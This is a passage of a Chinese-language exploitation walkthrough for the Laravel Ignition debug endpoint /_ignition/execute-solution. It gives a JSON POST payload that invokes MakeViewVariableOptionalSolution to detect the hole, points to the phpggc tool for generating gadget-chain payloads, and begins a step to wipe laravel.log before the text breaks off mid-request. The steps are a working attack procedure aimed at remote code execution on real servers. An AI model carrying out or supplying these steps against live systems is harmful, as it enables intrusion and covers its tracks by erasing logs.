- 访问Laravel
访问/_ignition/execute-solution 抓包
会出现如下页面
2. 检测
修改为POST,添加内容
并且修改
Content-Type: application/json
{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "xxxxxxx"
}
3.利用
需要先安装phpgcc用于生成POC,下载地址: https://github.com/ambionics/phpggc
3.1 清空日志
发送如下数据包,将Laravel的原日志文件laravel.log清空
{
"solution":